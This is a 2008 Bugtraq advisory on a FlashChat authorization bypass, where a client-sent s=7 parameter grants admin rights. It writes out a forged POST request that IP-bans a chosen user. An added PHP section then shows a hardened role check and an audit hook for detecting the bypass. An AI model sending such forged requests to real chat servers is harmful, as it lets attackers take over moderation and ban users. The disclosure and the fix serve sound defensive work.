List: bugtraq
Subject: flashchat severe bug
From: ch0p83 () gmail ! com
Date: 2008-10-17 14:44:38
Message-ID: 20081017144438.7383.qmail () securityfocus ! com
File: connection.php

if(
    ChatServer::userInRole($this->userid, ROLE_ADMIN) ||
    ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
    ($req['s'] == 7)   // <-- *bypass line*: $req['s'] is client-supplied
)
This piece of code allows a normal user to bypass role filtering and to be granted the admin role. To exploit the vulnerability, simply send the following POST data string to getxml.php while in the chat (for example by intercepting and modifying a legitimate message packet sent to the server with the Tamper Data plugin for Firefox).
For example, to ban a user, simply add the bypass to the normal ban request string:
replace:
//normal message sent to server that has been intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=
with:
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
//forged packet sent by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
*note the s=7 added
This will IP-ban the user with id 5581 from the chat.
eLiSiA - 17-10-2008
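The defect reported above is an authorization decision that can be satisfied by a request parameter the client controls. The following is an added example, not FlashChat's code and not part of the original post: it reproduces the shape of the quoted check with a stand-in ChatServer class (the userInRole method, the ROLE_* constants and the role table are assumed, constructed names mirroring the snippet), places a hardened version next to it, and adds a small audit hook that flags requests which carry the bypass parameter without a matching server-side role.

```php
<?php
// Added example (not FlashChat's own code). ChatServer::userInRole, the ROLE_*
// constants and the user/role table are constructed stand-ins for the snippet
// quoted in the post.

const ROLE_ADMIN = 'admin';
const ROLE_MODERATOR = 'moderator';
const ROLE_USER = 'user';

final class ChatServer
{
    // Constructed server-side role table, keyed by user id.
    private const ROLES = [
        1    => ROLE_ADMIN,
        2    => ROLE_MODERATOR,
        5581 => ROLE_USER,
        9000 => ROLE_USER,
    ];

    public static function userInRole(int $userid, string $role): bool
    {
        return (self::ROLES[$userid] ?? null) === $role;
    }
}

// Shape of the vulnerable check: the third operand depends only on the request,
// so any caller who sets s=7 satisfies the OR regardless of their real role.
function mayModerateVulnerable(int $userid, array $req): bool
{
    return ChatServer::userInRole($userid, ROLE_ADMIN)
        || ChatServer::userInRole($userid, ROLE_MODERATOR)
        || (($req['s'] ?? null) == 7);
}

// Hardened check: the decision rests only on server-held state. Request
// parameters may select which action to perform, never whether the caller
// is permitted to perform it.
function mayModerateHardened(int $userid, array $req): bool
{
    return ChatServer::userInRole($userid, ROLE_ADMIN)
        || ChatServer::userInRole($userid, ROLE_MODERATOR);
}

// Audit hook: returns a log line when an unprivileged caller sends the
// parameter that used to short-circuit the check, null otherwise. Wiring it
// to the application's real logger is left to the deployment.
function auditBypassAttempt(int $userid, array $req): ?string
{
    $carriesBypass = (($req['s'] ?? null) == 7);
    if ($carriesBypass && !mayModerateHardened($userid, $req)) {
        return sprintf(
            'privilege-bypass attempt: userid=%d sent s=7 with c=%s u=%s',
            $userid,
            $req['c'] ?? '-',
            $req['u'] ?? '-'
        );
    }
    return null;
}

// Constructed requests modelled on the packets in the post, parsed into arrays
// as PHP would expose them in $_POST.
$forgedByUser = ['s' => '7', 't' => '', 'r' => '0', 'u' => '5581',
                 'b' => '3', 'c' => 'banu', 'cid' => '1'];
$plainByMod   = ['t' => '', 'r' => '0', 'u' => '5581',
                 'b' => '3', 'c' => 'banu', 'cid' => '1'];

// Ordinary user (id 9000) sending the forged packet.
var_dump(mayModerateVulnerable(9000, $forgedByUser));
var_dump(mayModerateHardened(9000, $forgedByUser));
var_dump(auditBypassAttempt(9000, $forgedByUser));

// Genuine moderator (id 2) sending the normal ban packet.
var_dump(mayModerateHardened(2, $plainByMod));
var_dump(auditBypassAttempt(2, $plainByMod));
```

The design point is that authorization inputs and action inputs live in different trust domains: the role lookup is keyed by the authenticated session's user id, while everything in the POST body is attacker-controlled and may only choose among actions the role already allows. The audit hook is worth keeping after the fix, since a request that still carries the old bypass parameter from a non-privileged session is a cheap, high-signal indicator of someone probing for this bug.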